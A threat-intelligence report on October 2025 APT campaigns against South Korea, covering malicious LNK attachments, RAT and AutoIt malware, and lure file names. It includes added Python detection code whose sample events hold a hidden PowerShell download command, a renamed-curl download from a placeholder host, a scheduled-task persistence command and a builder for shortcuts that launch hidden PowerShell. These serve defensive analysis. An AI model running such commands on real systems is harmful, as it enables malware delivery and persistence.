October 2025 APT Attack Trends Report (South Korea)
Overview
AhnLab monitors Advanced Persistent Threat (APT) attacks in South Korea using its own infrastructure. This report covers the classification, statistics, and characteristics of the APT attacks in South Korea that were identified in October 2025.

Figure 1. Statistics of APT attacks in South Korea in October 2025
The majority of APT attacks identified in South Korea were distributed via spear phishing. In particular, attacks using JSE files increased compared to previous periods and accounted for the largest proportion of attacks in October 2025.
Trend of APT Attacks in South Korea
The following describes the cases and characteristics of each type of attack identified in APT attacks against South Korea in October 2025.
1) Spear Phishing
Spear phishing is a type of phishing attack that targets specific individuals or groups. Unlike regular phishing attacks, threat actors gather information about their targets during a reconnaissance phase before launching their attacks. Threat actors use the gathered information to craft their phishing emails, making it more likely that recipients will trust them. There are also cases where threat actors forge the sender's address through email spoofing. Most spear phishing attacks include malicious attachments or links in the emails, which prompt users to open them.
The following are the types of malware distributed using this technique.
1.1 Attacks Using LNK
Type A
This type results in the execution of RAT malware. It is mainly distributed in a compressed archive together with normal files. The distributed LNK file contains a malicious PowerShell command, which uses the Dropbox API or Google Drive to download the malware. It also creates additional script files and obfuscated RAT malware on the user's PC. The executed RAT malware performs various malicious behaviors according to the threat actor's commands, such as keylogging and capturing screenshots. The identified RAT types are XenoRAT and RoKRAT.
The confirmed file names are as follows.
| File Name |
| --- |
| Vol. 1078 (Oct 2, 2025) No. ** (Part ***) |
| 25.09.30-4025(****)***_Submission Schedule.lnk |
| How Will We Deal with "North Korea Armed with Nuclear Weapons".lnk |
| Establishment of Inter-Korean Civilian Exchange and Cooperation Association (Draft) |
| Articles of Association of the Inter-Korean Civilian Exchange and Cooperation Association.lnk |
| Form for Writing Inheritance-Related Materials.lnk |
| Establishment Purpose Statement (October 7, 2025).lnk |
| General Election of the Ja Min Party (Dakaichi).lnk |
| Cost Estimate for the Institute of Unification and National Security Studies.lnk |
| North Korea's Nuclear Threat in the Trump 2.0 Era, the U.S.-China Power Competition, and South Korea's Nuclear Options.lnk |
| Association Organizational Chart (October 11, 2025).lnk |

Table 1. Confirmed File Names
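Type A hinges on a shortcut whose embedded command line launches PowerShell. The following Python code is an added example, not code from the report or from AhnLab: it parses the ShellLinkHeader and StringData sections of an LNK file (per the MS-SHLLINK layout) to recover the target, working directory, arguments and ShowCommand, and then applies a few triage heuristics a defender can run before a suspicious attachment is ever opened. The build_lnk helper exists only to construct test fixtures; the flagged sample's argument string is a placeholder, not a real payload, and the 260-character "oversized arguments" threshold is an assumed heuristic.

```python
import re
import struct

# LinkFlags bits from MS-SHLLINK section 2.1.1
HAS_TARGET_IDLIST, HAS_LINK_INFO, HAS_NAME = 0x01, 0x02, 0x04
HAS_RELATIVE_PATH, HAS_WORKING_DIR, HAS_ARGUMENTS = 0x08, 0x10, 0x20
HAS_ICON_LOCATION, IS_UNICODE = 0x40, 0x80
# {00021401-0000-0000-C000-000000000046} serialised little-endian
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
SW_SHOWMINNOACTIVE = 7  # ShowCommand value that keeps the launched window out of sight
INTERPRETERS = ("powershell", "pwsh", "cmd.exe", "mshta", "wscript", "cscript")


def parse_lnk(data: bytes) -> dict:
    """Extract the fields that matter for triage from a raw .lnk byte string."""
    if len(data) < 76 or struct.unpack_from("<I", data, 0)[0] != 0x4C or data[4:20] != LNK_CLSID:
        raise ValueError("not a Windows shell link")
    flags, = struct.unpack_from("<I", data, 20)
    show_cmd, = struct.unpack_from("<I", data, 60)
    pos = 76
    if flags & HAS_TARGET_IDLIST:            # IDListSize (2 bytes) + item IDs
        size, = struct.unpack_from("<H", data, pos)
        pos += 2 + size
    if flags & HAS_LINK_INFO:                # LinkInfoSize counts itself
        size, = struct.unpack_from("<I", data, pos)
        pos += size
    unicode = bool(flags & IS_UNICODE)
    info = {"flags": flags, "show_command": show_cmd}
    # StringData appears in this fixed order, each item preceded by a char count
    for bit, name in ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                      (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                      (HAS_ICON_LOCATION, "icon_location")):
        if not flags & bit:
            info[name] = ""
            continue
        count, = struct.unpack_from("<H", data, pos)
        pos += 2
        nbytes = count * 2 if unicode else count
        raw = data[pos:pos + nbytes]
        pos += nbytes
        info[name] = raw.decode("utf-16-le") if unicode else raw.decode("cp1252", "replace")
    return info


def assess(info: dict) -> list:
    """Triage heuristics; each hit is a reason to treat the shortcut as suspicious."""
    findings = []
    target = (info["relative_path"] + " " + info["arguments"]).lower()
    if any(i in target for i in INTERPRETERS):
        findings.append("script_interpreter_target")
    if re.search(r"-w(?:indowstyle)?\s+hidden|-e(?:nc|ncodedcommand)?\s", info["arguments"], re.I):
        findings.append("hidden_or_encoded")
    if info["show_command"] == SW_SHOWMINNOACTIVE:
        findings.append("window_minimised")
    if len(info["arguments"]) > 260:   # assumed threshold: real document shortcuts carry few arguments
        findings.append("oversized_arguments")
    return findings


def build_lnk(relative_path: str, working_dir: str, arguments: str, show_command: int = 1) -> bytes:
    """Test fixture builder: a minimal unicode LNK with no IDList, LinkInfo or ExtraData."""
    flags = HAS_RELATIVE_PATH | HAS_WORKING_DIR | HAS_ARGUMENTS | IS_UNICODE
    header = struct.pack("<I16sIIQQQIIIHHII", 0x4C, LNK_CLSID, flags, 0x20,
                         0, 0, 0, 0, 0, show_command, 0, 0, 0, 0)

    def sd(text: str) -> bytes:
        return struct.pack("<H", len(text)) + text.encode("utf-16-le")

    return header + sd(relative_path) + sd(working_dir) + sd(arguments)


# Constructed fixtures (not files from the campaign)
SAMPLE_LNK = build_lnk(r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                       r"C:\Windows\System32",
                       '-WindowStyle Hidden -Command "<placeholder, not a real payload>"',
                       show_command=SW_SHOWMINNOACTIVE)
BENIGN_LNK = build_lnk(r"..\Documents\report.hwp", r"C:\Users\user\Documents", "")

if __name__ == "__main__":
    for label, blob in (("sample", SAMPLE_LNK), ("benign", BENIGN_LNK)):
        info = parse_lnk(blob)
        print(label, info["relative_path"], info["arguments"], assess(info))
```

Running the script prints the recovered target and arguments for both fixtures; the same parse_lnk/assess pair can be pointed at a file read in binary mode. ExtraData blocks (which can carry an environment-variable target or a console block) are not parsed here, so a shortcut with an empty relative path should still be examined by hand.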
Type B
This type downloads AutoIt malware. When the malicious PowerShell command in the LNK file is executed, it accesses an external URL and downloads additional files. A notable characteristic is that during this process, the curl.exe program is copied under a different file name (e.g., WpqNoXz.exe) and then executed. As a result, a legitimate AutoIt program and a malicious AutoIt script are downloaded. The downloaded files are then registered in the task scheduler so that they are executed persistently. The malicious AutoIt script is capable of executing commands, searching directories, uploading files, and downloading files.
The confirmed file names are as follows.
| File Name |
| --- |
| Statement of the Source of Funds Not Reported (Enforcement Decree of the Value-Added Tax Act).hwp.lnk |
| Attachment 1. North Korean Human Rights Organization_Product Sponsorship_Proposal_**.hwp.lnk |

Table 2. Confirmed File Names
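The chains described for Type A and Type B leave distinctive traces in process-creation telemetry: a PowerShell process launched from the shell and reaching Dropbox or Google Drive, a binary whose PE OriginalFileName is curl.exe running under another name (the WpqNoXz.exe copy), and a scheduled task created to run the AutoIt interpreter. The following Python sketch is an added example, not code from the report or from AhnLab, that flags those three behaviours over Sysmon Event ID 1 style records. The events, user names, paths and command lines are constructed samples; the .invalid host names are placeholders.

```python
import re
from typing import Dict, List

# Constructed Sysmon Event ID 1 style records (hypothetical telemetry, not from the report)
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {   # Type A: hidden PowerShell launched via the shell, fetching from the Dropbox API
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "OriginalFileName": "PowerShell.EXE",
        "CommandLine": r'powershell.exe -windowstyle hidden -c "Invoke-WebRequest https://api.dropboxapi.com/2/files/download -OutFile $env:TEMP\s.dat"',
    },
    {   # Type B: curl.exe copied to a random name (WpqNoXz.exe is the example name in the report)
        "Image": r"C:\Users\user\AppData\Local\Temp\WpqNoXz.exe",
        "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "OriginalFileName": "curl.exe",
        "CommandLine": r"WpqNoXz.exe -o AutoIt3.exe https://download.invalid/a",
    },
    {   # Type B: persistence via a scheduled task that runs the AutoIt interpreter and script
        "Image": r"C:\Windows\System32\schtasks.exe",
        "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "OriginalFileName": "schtasks.exe",
        "CommandLine": r'schtasks /create /sc minute /mo 5 /tn Updater /tr "C:\Users\user\AppData\Local\Temp\AutoIt3.exe C:\Users\user\AppData\Local\Temp\s.au3"',
    },
    {   # Benign control: curl.exe run under its own name from a console
        "Image": r"C:\Windows\System32\curl.exe",
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "OriginalFileName": "curl.exe",
        "CommandLine": r"curl.exe -O https://download.invalid/readme.txt",
    },
]

CLOUD_HOSTS = ("dropboxapi.com", "dropbox.com", "drive.google.com", "googleapis.com")
POWERSHELL = ("powershell.exe", "pwsh.exe")


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(ev: Dict[str, str]) -> List[str]:
    """Return the names of every rule the event trips (empty list means no finding)."""
    image = basename(ev.get("Image", ""))
    parent = basename(ev.get("ParentImage", ""))
    orig = ev.get("OriginalFileName", "").lower()
    cmd = ev.get("CommandLine", "")
    hits = []
    # Type A: PowerShell talking to a consumer cloud-storage API
    if image in POWERSHELL and any(h in cmd.lower() for h in CLOUD_HOSTS):
        hits.append("ps_cloud_download")
    # Type B: the PE version resource says curl.exe but the file on disk is called something else
    if orig == "curl.exe" and image != "curl.exe":
        hits.append("renamed_curl")
    # Type B: task scheduler persistence pointing at AutoIt or an .au3 script
    if image == "schtasks.exe" and "/create" in cmd.lower() and re.search(r"autoit3\.exe|\.au3\b", cmd, re.I):
        hits.append("schtask_autoit")
    # Lower-confidence context: hidden/encoded PowerShell spawned by the shell (a double-clicked shortcut)
    if image in POWERSHELL and parent == "explorer.exe" and re.search(r"-w(?:indowstyle)?\s+hidden|-enc", cmd, re.I):
        hits.append("hidden_ps_from_explorer")
    return hits


def scan(events: List[Dict[str, str]]) -> List[tuple]:
    """Pair each alerting event index with its rule hits, skipping clean events."""
    return [(i, classify(ev)) for i, ev in enumerate(events) if classify(ev)]


if __name__ == "__main__":
    for idx, rules in scan(SAMPLE_EVENTS):
        print(idx, basename(SAMPLE_EVENTS[idx]["Image"]), rules)
```

The renamed_curl rule depends on the OriginalFileName field that Sysmon populates from the PE version resource, so it survives the copy-and-rename step the report describes. The schtask_autoit rule will also fire on legitimate AutoIt automation, so it is best treated as a correlation signal alongside the other two rather than an alert on its own.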
Decoy files are used to make it appear to the user that a legitimate file has been opened.

Figure 2. Decoy file